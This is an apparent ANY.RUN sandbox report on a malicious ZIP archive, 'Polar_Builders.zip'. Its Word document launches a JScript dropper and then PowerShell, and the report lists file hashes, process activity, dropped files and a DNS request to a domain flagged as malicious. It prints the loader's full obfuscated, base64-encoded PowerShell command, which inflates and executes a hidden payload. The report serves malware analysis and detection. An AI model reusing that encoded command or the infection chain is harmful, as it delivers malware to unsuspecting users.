analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Polar_Builders.zip

Full analysis: https://app.any.run/tasks/e415b08c-4e18-470e-b496-f89e4e1730ff
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: August 17, 2019, 11:47:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
malscr-1
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

3D2B5D3DD03470BB39897C069A08AD3E

SHA1:

68333BA1A0946CC081A1A7B2845584AB9940538A

SHA256:

D8A8FFFE3976E8783A2CB723F82006A3ADC32A071F80727D7EA0D5A624749147

SSDEEP:

768:RBnYJXAbwjPshAOEkYkVmMWUqoaZdv4I9p91qI+hewkn1Xc/H5O2Jg9n5Gcu:smbw0TEAolUqoaZdQWgcHnWJu9n5Zu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes scripts

      • WINWORD.EXE (PID: 3648)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3648)

  • SUSPICIOUS

    • Creates files in the Windows directory

      • WINWORD.EXE (PID: 3648)
      • powershell.exe (PID: 1744)

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2892)

    • Removes files from Windows directory

      • powershell.exe (PID: 1744)

    • Executes PowerShell scripts

      • WScript.exe (PID: 3892)

    • Creates files in the user directory

      • powershell.exe (PID: 1744)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3648)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3648)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2019:08:14 12:04:29
ZipCRC: 0xaef5be20
ZipCompressedSize: 42234
ZipUncompressedSize: 81920
ZipFileName: info_08.14.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs wscript.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2892"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Polar_Builders.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3648"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2892.48729\info_08.14.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3892"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\cFsXzFnfXNHTKKdtFNhC.js" C:\Windows\System32\WScript.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
1744"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcARABjAHEANwBDAG8ATQB3AEYAQQBEAFEAWAAzAEUAUQByAHQATAAyAEIAagB2ADAAbwBVAGcASABiAGEARQBRAG4AQQBJAHUARABpAGIAMgBGAGgAVgBOAG8AbwBaAGEAKwB2AFYAMQBPAHMAdgB4AFYAMQBJAHAAQgBxAEIAaABCADcAUQBlAHoASQBiAHEAcQBYAEUAUQBlAGcAWABWAG8AcwBhAFMAVgBKADMAeABqAGcAcQBSAGUAUAA2AFcATQBUAGUAbAA1AGsAYgBtAGoAeQBlAC8AQgA5AEEANgBaADIAUABHAGYAaAA4ADUAMABOAHoAUgBlADcAbQBlAHMARABFAGoAbQA5AHcAcwBtAFgAUABUAGoATABhADEAdAB5AEcAZABTAE0AcwBMADkAdABFAFIAOQBoADUAawBjAFYAVgAyACsAbQBYAFcAcABSAEkAMAAyAHUAbwBjAEkAWAAwAEoAdwB1AFEAUAAnACkAIAAsAFsAcwBZAHMAVABlAG0ALgBpAG8ALgBjAE8ATQBwAFIAZQBTAHMAaQBPAE4ALgBDAG8AbQBwAHIAZQBzAHMASQBPAE4ATQBPAEQARQBdADoAOgBEAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACYAKAAnAGYAJwArACcAbwByAGUAJwArACcAYQBjAEgAJwApAHsAIAAmACgAJwBOAEUAVwAtAG8AYgAnACsAJwBKACcAKwAnAEUAYwBUACcAKQAgACAAaQBgAG8ALgBgAFMAYABUAHIAZQBhAG0AUgBFAEEARABFAFIAKAAkAF8ALABbAHMAeQBTAFQAZQBtAC4AVABFAHgAVAAuAEUATgBjAG8AZABJAG4ARwBdADoAOgBhAHMAQwBpAGkAKQAgAH0AfAAuACgAJwBGAG8AcgBFAGEAJwArACcAQwAnACsAJwBIACcAKQB7ACQAXwAuAHIAZQBBAGQAVABvAEUATgBEACgAKQAgAH0AIAApACAAfAAuACgAJwBJAGUAeAAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 928
Read events
1 443
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF2A2.tmp.cvr
MD5:
SHA256:
1744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4VV3M9GP52A9O8JMFOIV.temp
MD5:
SHA256:
1744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16fed7.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
3648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:D9736D16779E12080DB43533CB8DCBB2
SHA256:2472AE0653B9809153A6B6D69938B7CE73990F72AF2346E8CDEAAD0E09E03068
1744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
2892WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb2892.48729\info_08.14.docdocument
MD5:7F04983BA4AD42F21B0D950600DC060A
SHA256:3C6B32B668105AF6CDA80BD03127BE703F1B2848F3D1CA44EDCB23CC0660E719
3648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb2892.48729\~$fo_08.14.docpgc
MD5:C55C75958100A81E876C3F07CD369B49
SHA256:A2FBCF8B2E00A879912D915D4F980392D1F5C9A4A62179BF9EC5C6AD94C97954
3648WINWORD.EXEC:\Windows\Temp\cFsXzFnfXNHTKKdtFNhC.jstext
MD5:40D5C2C2C30465730C8A422ABF3208EC
SHA256:A54FAE45B5E1AA43E96702848D874E32C5685D7622940317541BF7CA171324C2
3648WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4D9053B84DC4B9566200E05EF12570D3
SHA256:5006A48940A7C05D08D8B8173F19FE03C62532F3940B6990C002FDAED9F4C00D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
zvaleriefs96.com
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Polar_Builders.zip